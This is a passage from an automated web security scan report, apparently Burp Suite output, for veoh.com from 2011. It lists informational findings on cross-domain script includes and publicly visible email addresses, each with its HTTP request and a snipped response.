<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.76. http://www.veoh.com/xd_receiver.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /xd_receiver.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /xd_receiver.htm HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=f8c7347543a5d2e2d76864f96079fa3d&extern=0&channel=http%3A%2F%2Fwww.veoh.com%2Fxd_receiver.htm&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Accept-Ranges: bytes
Date: Thu, 03 Feb 2011 20:52:29 GMT
Last-Modified: Sun, 30 Jan 2011 13:47:13 GMT
Server: Apache/2.2.10 (Unix) PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Content-Length: 297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<body>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.js" type="text/javascript"></script>
...[SNIP]...

9. Email addresses disclosed  previous
There are 71 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


9.1. http://www.veoh.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:45:48 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=74
Content-Length: 50459

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.2. http://www.veoh.com/browse/groups  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/groups

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/groups HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:51 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=28
Content-Length: 71827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.3. http://www.veoh.com/browse/groups/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/groups/

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/groups/ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:44:49 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=66
Content-Length: 71825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.4. http://www.veoh.com/browse/movies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/movies

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/movies HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:33:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=83
Content-Length: 104211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.5. http://www.veoh.com/browse/movies/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/movies/

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/movies/ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:42:20 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=83
Content-Length: 104211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.6. http://www.veoh.com/browse/music  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/music

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/music HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:35:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=12
Content-Length: 69925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.7. http://www.veoh.com/browse/music/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/music/

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/music/ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:44:47 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90
Content-Length: 69925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.8. http://www.veoh.com/browse/tvshows  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/tvshows

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/tvshows HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:33:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=54
Content-Length: 78636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.9. http://www.veoh.com/browse/tvshows/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/tvshows/

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/tvshows/ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:39:00 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=91
Content-Length: 78636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.10. http://www.veoh.com/browse/videos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/videos HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:30:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=57
Content-Length: 116662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.11. http://www.veoh.com/browse/videos/category/action_adventure  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/videos/category/action_adventure HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:24 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=85
Content-Length: 115983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.12. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:27:56 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=92
Content-Length: 135910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.13. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v189741093prNNZM5

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v189741093prNNZM5 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=98
Content-Length: 134924

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.14. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8  previous  next

